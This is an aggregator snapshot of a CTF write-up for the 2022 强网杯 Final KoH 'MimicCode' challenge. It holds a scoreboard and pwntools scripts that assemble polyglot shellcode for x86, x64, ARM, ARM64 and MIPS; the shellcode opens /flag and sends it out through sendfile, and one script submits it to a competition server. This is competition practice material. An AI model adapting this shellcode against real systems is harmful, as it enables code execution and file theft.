4
强网杯 2022 Final KoH MimicCode
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2022/08/29/mimiccode/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
强网杯 2022 Final KoH MimicCode
更新中…跨架构shellcode
Rank 1: 0ops with score <41650824>
Rank 1: eee with score <41650824>
Rank 3: 0x300R with score <5531658>
Rank 4: Lilac with score <5119553>
Rank 5: Redbud with score <3056934>
Rank 6: 铁鹰特战队 with score <245566>
Rank 7: NeSE with score <131111>
Rank 8: DAS with score <78122>
Rank 9: 福来阁 with score <61595>
Rank 10: syclover with score <51423>
Rank 11: 雷泽-BOI with score <21063>
Rank 11: Xp0int with score <21063>
from pwn import *
def compile_x86(sc):
r = asm(sc,arch='i386')
print(r)
f = open('86.bin','wb').write(r)
return r
def decompile_x86(sc):
r = disasm(sc,arch='i386')
print(r)
return r
def compile_x64(sc):
r = asm(sc,arch='amd64')
print(r)
return r
def decompile_x64(sc):
r = disasm(sc,arch='amd64')
print(r)
return r
def compile_arm(sc):
r = asm(sc,arch='arm')
print(r)
return r
def compile_thumb(sc):
r = asm(sc,arch='thumb')
print(r)
return r
def compile_arm64(sc):
r = asm(sc,arch='aarch64')
print(r)
return r
def compile_mips(sc):
r = asm(sc,arch='mips',endian='big')
print(r)
return r
x86_x64_jmp = compile_x86('''
mov eax,cs
mov ebx,0x23
sub eax,ebx
jnz x64
x32:
mov ebx, 0x67
push ebx
mov ebx, 0x616c662f
push ebx
mov eax, 5
mov ebx, esp
xor ecx, ecx
int 0x80
mov ebx, 1
mov ecx, eax
xor edx, edx
mov esi, 1000
mov eax, 0xbb
int 0x80
x64:
''')
x64_sc = compile_x64('''
mov rbx, 0x67616c662f
push rbx
mov rax, 2
mov rdi, rsp
xor rsi, rsi
syscall
mov rdi, 1
mov rsi, rax
xor rdx, rdx
mov r10, 1000
mov rax, 40
syscall
''')
arm_sc = compile_arm('''
adr r0, flag
eor r1, r1
eor r2, r2
mov r7, #5
svc 0
mov r1, r0
mov r0, #1
eor r2, r2
mov r3, #100
mov r7, #0xbb
svc 0
flag:
.ascii "/flag"
''')
arm64_sc = compile_arm64('''
adr x1, flag
mov x2, #0
mov x0, x2
mov x8, #56
svc 0
/* call sendfile(1, 'x0', 0, 0x7fffffff) */
mov x1, x0
mov x0, #1
mov x2, #0
mov x3, 100
mov x8, #SYS_sendfile
svc 0
flag:
.asciz "/flag"
''')
mips_sc = compile_mips('''
li $t1, 0x2f666c61
sw $t1, ($sp)
lui $t9, 0x6700
sw $t9, 4($sp)
li $t1,0xfa5
li $t2,0x106f
li $t6,0x40054c
beq $ra,$t6,main
nop
li $t1,0x138a
li $t2,0x13af
main:
move $a0,$sp
li $a1,0
li $a2,0
move $v0, $t1
syscall 0x40404
li $a0, 1
move $a1, $v0
li $a3, 100
move $v0, $t2
syscall 0x40404
''')
#io = process("./ShellcodeRunnerX86")
#gdb.attach(io,"b * 0x080497B3")
#io = process("./ShellcodeRunnerX64")
#gdb.attach(io,"b * 0x401717")
#io = process(["/bin/sh",'-c','qemu-arm ./ShellcodeRunnerARM32'])
#io = process(["/bin/sh",'-c','qemu-arm -g 1234 ./ShellcodeRunnerARM32'])
#gdb.attach(io,"b * 0x10614")
#io = process(["/bin/sh",'-c','qemu-aarch64 ./ShellcodeRunnerARM64'])
#io = process(["/bin/sh",'-c','qemu-aarch64 -g 1234 ./ShellcodeRunnerARM64'])
#b * 0x400768
#io = process(["/bin/sh",'-c','qemu-mips ./ShellcodeRunnerMIPS'])
#io = process(["/bin/sh",'-c','qemu-mips -g 1234 ./ShellcodeRunnerMIPS'])
#b * 0x400544
io = process(["/bin/sh",'-c','qemu-mips64 ./ShellcodeRunnerMIPS64'])
#io = process(["/bin/sh",'-c','qemu-mips64 -g 1234 ./ShellcodeRunnerMIPS64'])
#b * 120004088
thumb_jmp = compile_arm('''
add r2, pc, #1
bx r2
''')
arm_jmp = bytes.fromhex('2c0000ea')
jmp_0x36_x86_x64 = bytes.fromhex('eb34001c')
# 2273ff9c addi s3, s3, -100
# 1a600050 blez s3, 0x144
# 2273ff9c addi s3, s3, -100 !!! nop
# 2273ff9c addi s3, s3, -100 !!! nop
mips_jmp = bytes.fromhex('2273ff9c1a6000512273ff9c2273ff9c')
#mips_jmp = bytes.fromhex('1ae0003b')
test = arm_jmp + mips_jmp + jmp_0x36_x86_x64 + arm64_sc + x86_x64_jmp + x64_sc
test = test.ljust(0xbc,b'a') # len: 0xbc
test += arm_sc # len: 0xf0 arm_sc : 52
test += mips_sc # len: 0x134 mips_sc: 68
#print(disasm(mips_sc,arch='mips',endian='big'))
#test = test.ljust(0x150,b'a')
test += bytes.fromhex('18000000') # bug
# 0: 1800ffea blez zero, 0xffffffac
# mips jump back
test += bytes.fromhex('1800ffe7')
print(len(test))
print((test).hex())
print(pow(0x1000/len(test),6))
io.send(test)
io.interactive()
from pwn import *
from hashlib import *
import os
#context(arch='i386',log_level='debug')
io = remote("172.20.5.61",9999)
io.recvuntil(b"'''\nchal: ")
chal = io.recvline().replace(b"\n",b"")
log.success(str(chal))
sol = b''
for i in range(0x1000000):
tmp = os.urandom(4)
if sha256(chal+ tmp).hexdigest().startswith('00000') :
print(tmp.hex())
sol = tmp.hex()
break
def compile_x86(sc):
r = asm(sc,arch='i386')
print(r)
f = open('86.bin','wb').write(r)
return r
def decompile_x86(sc):
r = disasm(sc,arch='i386')
print(r)
return r
def compile_x64(sc):
r = asm(sc,arch='amd64')
print(r)
return r
def decompile_x64(sc):
r = disasm(sc,arch='amd64')
print(r)
return r
def compile_arm(sc):
r = asm(sc,arch='arm')
print(r)
return r
def compile_thumb(sc):
r = asm(sc,arch='thumb')
print(r)
return r
def compile_arm64(sc):
r = asm(sc,arch='aarch64')
print(r)
return r
def compile_mips(sc):
r = asm(sc,arch='mips',endian='big')
print(r)
return r
x86_x64_jmp = compile_x86('''
mov eax,cs
mov ebx,0x23
sub eax,ebx
jnz x64
x32:
mov ebx, 0x67
push ebx
mov ebx, 0x616c662f
push ebx
mov eax, 5
mov ebx, esp
xor ecx, ecx
int 0x80
mov ebx, 1
mov ecx, eax
xor edx, edx
mov esi, 1000
mov eax, 0xbb
int 0x80
x64:
''')
x64_sc = compile_x64('''
mov rbx, 0x67616c662f
push rbx
mov rax, 2
mov rdi, rsp
xor rsi, rsi
syscall
mov rdi, 1
mov rsi, rax
xor rdx, rdx
mov r10, 1000
mov rax, 40
syscall
''')
arm_sc = compile_arm('''
adr r0, flag
eor r1, r1
eor r2, r2
mov r7, #5
svc 0
mov r1, r0
mov r0, #1
eor r2, r2
mov r3, #100
mov r7, #0xbb
svc 0
flag:
.ascii "/flag"
''')
arm64_sc = compile_arm64('''
adr x1, flag
mov x2, #0
mov x0, x2
mov x8, #56
svc 0
/* call sendfile(1, 'x0', 0, 0x7fffffff) */
mov x1, x0
mov x0, #1
mov x2, #0
mov x3, 100
mov x8, #SYS_sendfile
svc 0
flag:
.asciz "/flag"
''')
mips_sc = compile_mips('''
li $t1, 0x2f666c61
sw $t1, ($sp)
lui $t9, 0x6700
sw $t9, 4($sp)
li $t1,0xfa5
li $t2,0x106f
li $t6,0x40054c
beq $ra,$t6,main
nop
li $t1,0x138a
li $t2,0x13af
main:
move $a0,$sp
li $a1,0
li $a2,0
move $v0, $t1
syscall 0x40404
li $a0, 1
move $a1, $v0
li $a3, 100
move $v0, $t2
syscall 0x40404
''')
arm_jmp = bytes.fromhex('2c0000ea')
jmp_0x36_x86_x64 = bytes.fromhex('eb34001c')
# 2273ff9c addi s3, s3, -100
# 1a600050 blez s3, 0x144
# 2273ff9c addi s3, s3, -100 !!! nop
# 2273ff9c addi s3, s3, -100 !!! nop
mips_jmp = bytes.fromhex('2273ff9c1a6000512273ff9c2273ff9c')
#mips_jmp = bytes.fromhex('1ae0003b')
test = arm_jmp + mips_jmp + jmp_0x36_x86_x64 + arm64_sc + x86_x64_jmp + x64_sc
test = test.ljust(0xbc,b'a') # len: 0xbc
test += arm_sc # len: 0xf0 arm_sc : 52
test += mips_sc # len: 0x134 mips_sc: 68
#print(disasm(mips_sc,arch='mips',endian='big'))
#test = test.ljust(0x150,b'a')
test += bytes.fromhex('18000000') # bug
# 0: 1800ffea blez zero, 0xffffffac
# mips jump back
test += bytes.fromhex('1800ffe7')
test = test.hex()
f = open('sc.bin','wb').write(bytes.fromhex(test))
print(test)
io.sendafter(b"sol:",sol.encode())
sleep(0.1)
io.sendlineafter(b"Input your team token",b'111111')
io.sendlineafter(b"(0x1000 max, hex, end with",test)
io.interactive()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK